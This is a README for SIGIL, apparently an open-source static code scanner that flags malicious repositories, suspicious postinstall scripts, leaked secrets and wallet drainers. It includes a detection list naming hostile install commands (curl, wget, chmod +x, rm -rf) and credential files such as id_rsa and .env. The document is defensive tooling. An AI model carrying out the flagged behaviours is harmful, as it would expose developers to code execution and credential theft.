Arcane Intelligence for Code Integrity
SIGIL is an AI-powered, heuristic-driven code scanner designed to protect developers from malicious repositories, suspicious dependencies, and hidden security threats — especially targeting fake job offers and fraudulent bounties.
Inspired by arcane sigils and futuristic Web3 aesthetics, SIGIL provides a clear, actionable security report before you ever run the code.
Trust the Sigil. Verify before you clone.
SIGIL is a developer security companion that analyzes repositories using:
- 🧠 AI-assisted pattern recognition
- ⚡ Heuristic threat detection
- 🔒 Dependency & script inspection
- 🪬 SIGIL Score — a clear risk assessment (LOW / MEDIUM / HIGH)
- 📊 Static analysis only — no code execution for maximum safety
Built for developers who want quick, meaningful insights without deep security knowledge.
Detects:
- Suspicious install/postinstall scripts (curl, wget, chmod +x, rm -rf)
- Dangerous or deprecated dependencies
- High-entropy secrets (private keys, mnemonics, API tokens)
- Wallet drainer patterns
- Obfuscated or unusual JavaScript
- Dangerous files (
.pem,.env,id_rsa,.ps1,.bat, binaries) - Typosquatting in package names
- Hidden folders and unexpected artifacts
- Risk level: LOW / MEDIUM / HIGH
- Detailed list of findings with severity
- File locations and context
- AI-generated summary explaining risks in plain language
- Recommended actions for developers
- Elegant landing page with arcane-tech aesthetic
- Clean scanning flow with real-time feedback
- Error handling & validation
- Responsive design
- Demo repositories for testing
Frontend (Next.js) → API (Express) → @sigil/core → Scan Results
- Repository URL input
/scanpage with loading states- Results renderer with risk badges
- Error handling
- Validates GitHub URLs
- Calls
scanRepository()from core - Returns structured JSON findings
- Rate limiting and input sanitization
- Reads repository files via GitHub API (no cloning)
- Applies heuristic rules:
- Script analysis
- Dependency checking
- Secret detection
- File pattern matching
- Entropy analysis
- Computes risk score
- Returns consistent output format
Important: SIGIL MVP does not execute any code from analyzed repositories. All analysis is static and safe.
{
"repo": "https://github.com/example/repo",
"riskLevel": "HIGH",
"score": 85,
"findings": [
{
"type": "script",
"severity": "high",
"message": "Suspicious postinstall script detected",
"file": "package.json",
"details": "Contains curl command downloading from external source"
},
{
"type": "secret",
"severity": "critical",
"message": "Possible private key detected",
"file": ".env",
"details": "High entropy string matching private key pattern"
}
],
"summary": "This repository contains multiple high-risk indicators including suspicious installation scripts and potential leaked credentials. Review carefully before use."
}| Layer | Technology |
|---|---|
| Frontend | Next.js 14 • TailwindCSS • Shadcn/UI |
| Backend | Node.js • Express |
| Core Engine | TypeScript • Heuristics + AI |
| CLI | Node + Commander |
| Monorepo | PNPM + Turborepo |
| Analysis | Static file analysis • GitHub API |
pnpm install
pnpm devAccess at: http://localhost:3000
SIGIL includes a powerful command-line interface for scanning repositories directly from your terminal.
Installation:
pnpm install -g sigil-cliUsage:
# Scan a GitHub repository
sigil scan https://github.com/user/repo
# Scan a local directory
sigil scan ./my-project
# Get help
sigil --helpCLI Features:
- 🚀 Fast, lightweight scanning
- 📊 Formatted risk reports in terminal
- 🎨 Color-coded severity levels
- 📝 Detailed findings with file locations
- ⚡ Perfect for CI/CD integration
SIGIL includes demo repositories for testing:
- sigil-demo-clean — Safe repository with no issues
- sigil-demo-suspicious — Contains suspicious postinstall script
- sigil-demo-malicious — Multiple high-risk indicators (leaked keys, obfuscation)
sigil/
│
├── apps/
│ ├── web/ → Next.js frontend
│ └── api/ → Express REST API
│
├── packages/
│ ├── core/ → Analysis engine + heuristics
│ └── cli/ → CLI tool
│
└── turbo.json → Monorepo configuration
- Static analysis engine
- GitHub repository scanning
- Heuristic detection rules
- Risk scoring system
- Web interface
- Functional CLI tool (scan repos from terminal)
Phase 1: Enhanced Analysis
- Sandbox execution environment (Docker/QEMU)
- Dynamic behavior monitoring
- Network traffic capture (pcap)
- Filesystem changes tracking
- Syscall analysis
Phase 2: Advanced Security
- SAST integration (Slither, Semgrep, Mythril)
- MISP threat intelligence
- MITRE ATT&CK mapping
- Vulnerability database correlation
Phase 3: Web3 Integration
- On-chain verification (SIGIL Seal)
- Smart contract auditing
- Wallet interaction analysis
- Blockchain attestation (ERC-721 / Stellar)
Phase 4: Enterprise Features
- Team collaboration
- CI/CD integration
- API for automated scanning
- Custom rule creation
- Advanced reporting
SIGIL is designed with security-first principles:
- No code execution in MVP — zero risk of RCE
- Read-only analysis — no modifications to repositories
- Input validation — strict URL and size limits
- Rate limiting — protection against abuse
- Privacy-focused — no storage of analyzed code
- Transparent — open-source heuristics
Contributions are welcome! Please read CONTRIBUTING.md for guidelines.
MIT License — free to use, modify, and expand.
Trust the Sigil. Verify before you clone.